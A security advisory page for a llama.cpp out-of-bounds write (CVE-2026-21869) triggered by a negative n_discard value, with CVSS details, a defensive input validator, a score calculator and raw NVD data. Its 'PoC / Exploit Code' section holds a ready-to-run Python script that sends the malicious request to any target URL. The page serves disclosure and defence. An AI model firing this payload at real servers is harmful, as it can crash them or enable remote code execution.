Security Vulnerability Report
CVE-2026-21869 CVSS 8.8 HIGH

CVE-2026-21869

Published: 2026-01-08 00:16:00
Last Modified: 2026-02-02 19:12:36

Description

llama.cpp is an inference engine for several LLM models, written in C/C++. In commit 55d4206c8 and earlier, the llama.cpp server's completion endpoints parse the n_discard parameter directly from JSON input without checking that it is non-negative. When a negative value is supplied and the context fills up, llama_memory_seq_rm/add receives a reversed range and a negative offset, causing out-of-bounds memory writes in the token evaluation loop. This deterministic memory corruption can crash the process or enable remote code execution (RCE). There is no fix at the time of publication.
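
Since the description attributes the flaw to a missing non-negativity check, one stopgap is to reject bad values before they reach the server. The sketch below assumes a hypothetical proxy or wrapper in front of the llama.cpp server; `validate_completion_request` and `InvalidRequest` are illustrative names, not part of llama.cpp, and this is not the upstream fix.

```python
import json


class InvalidRequest(ValueError):
    """Raised when a completion request carries an unsafe parameter."""


def validate_completion_request(raw_body: bytes) -> dict:
    """Parse a JSON completion request and reject a negative n_discard.

    Hypothetical helper for a proxy in front of the server; not llama.cpp code.
    """
    try:
        body = json.loads(raw_body)
    except (json.JSONDecodeError, UnicodeDecodeError) as exc:
        raise InvalidRequest(f"body is not valid JSON: {exc}") from exc
    if not isinstance(body, dict):
        raise InvalidRequest("body must be a JSON object")

    # A missing n_discard is passed through so the server can apply its default.
    if "n_discard" in body:
        n_discard = body["n_discard"]
        # bool is a subclass of int in Python, so exclude it explicitly.
        if isinstance(n_discard, bool) or not isinstance(n_discard, int):
            raise InvalidRequest("n_discard must be an integer")
        if n_discard < 0:
            raise InvalidRequest("n_discard must be non-negative")
    return body
```

A caller would forward the request only when the function returns, and answer with an HTTP 400 when it raises `InvalidRequest`.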

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
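
To show how the vector string maps to the score, here is a minimal sketch of the CVSS v3.1 base score calculation. It assumes an unchanged scope (S:U), as in this vector, and uses the metric weights and round-up rule from the CVSS v3.1 specification; the function names are illustrative.

```python
import math

# Metric weights from the CVSS v3.1 specification (valid for unchanged scope).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, per the CVSS v3.1 Roundup definition."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score of a CVSS:3.1 vector with unchanged scope."""
    prefix, *parts = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError("expected a CVSS:3.1 vector")
    metrics = dict(part.split(":") for part in parts)
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles unchanged scope (S:U)")

    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"))  # 8.8
```

The only metric holding this vector below the top band is UI:R (user interaction required), which lowers the exploitability term.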

Configurations (Affected Products)

cpe:2.3:a:ggml:llama.cpp:-:*:*:*:*:*:*:* - VULNERABLE
llama.cpp <= 55d4206c8 (commit)
llama.cpp all versions prior to patch

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json
import sys

import requests

# CVE-2026-21869 PoC - llama.cpp n_discard out-of-bounds write
# Target: llama.cpp server with vulnerable completion endpoint


def exploit_llama_cpp(target_url, payload_prompt="test"):
    """
    Exploit for CVE-2026-21869
    Sends a crafted request with negative n_discard value
    """
    exploit_data = {
        "prompt": payload_prompt,
        "n_predict": 100,
        "n_discard": -1,  # Negative value triggers OOB write
    }
    headers = {"Content-Type": "application/json"}

    try:
        print(f"[*] Sending exploit payload to {target_url}")
        print(f"[*] Payload: {json.dumps(exploit_data)}")
        response = requests.post(
            f"{target_url}/completion",
            json=exploit_data,
            headers=headers,
            timeout=30,
        )
        print(f"[+] Response status: {response.status_code}")
        print(f"[+] Response: {response.text[:500]}")
        if response.status_code == 200:
            print("[*] Request completed - check for OOB write or crash")
        else:
            print("[*] Server may have crashed or rejected request")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False
    return True


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-21869.py <target_url>")
        print("Example: python cve-2026-21869.py http://localhost:8080")
        sys.exit(1)
    target = sys.argv[1].rstrip('/')
    exploit_llama_cpp(target)

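References

https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-8947-pfff-2f3c (Exploit, Vendor Advisory)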

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21869", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:16:00.297", "lastModified": "2026-02-02T19:12:36.020", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "llama.cpp is an inference of several LLM models in C/C++. In commits 55d4206c8 and prior, the n_discard parameter is parsed directly from JSON input in the llama.cpp server's completion endpoints without validation to ensure it's non-negative. When a negative value is supplied and the context fills up, llama_memory_seq_rm/add receives a reversed range and negative offset, causing out-of-bounds memory writes in the token evaluation loop. This deterministic memory corruption can crash the process or enable remote code execution (RCE). There is no fix at the time of publication."}, {"lang": "es", "value": "llama.cpp es una inferencia de varios modelos LLM en C/C++. En los commits 55d4206c8 y anteriores, el parámetro n_discard se analiza directamente de la entrada JSON en los puntos finales de completado del servidor de llama.cpp sin validación para asegurar que no sea negativo. Cuando se suministra un valor negativo y el contexto se llena, llama_memory_seq_rm/add recibe un rango invertido y un desplazamiento negativo, causando escrituras de memoria fuera de límites en el bucle de evaluación de tokens. Esta corrupción de memoria determinista puede bloquear el proceso o permitir la ejecución remota de código (RCE). No hay una solución en el momento de la publicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ggml:llama.cpp:-:*:*:*:*:*:*:*", "matchCriteriaId": "0A466917-A76C-4F63-B744-EC07FFB90CAF"}]}]}], "references": [{"url": "https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-8947-pfff-2f3c", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-8947-pfff-2f3c", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
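
The record carries two CVSS v3.1 assessments, so a consumer should read each entry's type rather than take the first score. The following is a small sketch of that lookup; it embeds a trimmed copy of the record containing only the fields it reads, and `summarize_metrics` is an illustrative name.

```python
import json

# Trimmed copy of the record, keeping only the fields this sketch reads.
RECORD = json.loads("""
{"cve": {"id": "CVE-2026-21869", "metrics": {"cvssMetricV31": [
  {"type": "Secondary",
   "cvssData": {"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "baseScore": 8.8, "baseSeverity": "HIGH"}},
  {"type": "Primary",
   "cvssData": {"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "baseScore": 9.8, "baseSeverity": "CRITICAL"}}
]}}}
""")


def summarize_metrics(record: dict) -> list[tuple[str, float, str]]:
    """Return (type, base score, severity) for each CVSS v3.1 entry."""
    entries = record["cve"]["metrics"].get("cvssMetricV31", [])
    return [
        (e["type"], e["cvssData"]["baseScore"], e["cvssData"]["baseSeverity"])
        for e in entries
    ]


for kind, score, severity in summarize_metrics(RECORD):
    print(f"{kind}: {score} {severity}")
```

The two entries differ only in the user interaction metric (UI:R versus UI:N), which accounts for the gap between 8.8 and 9.8.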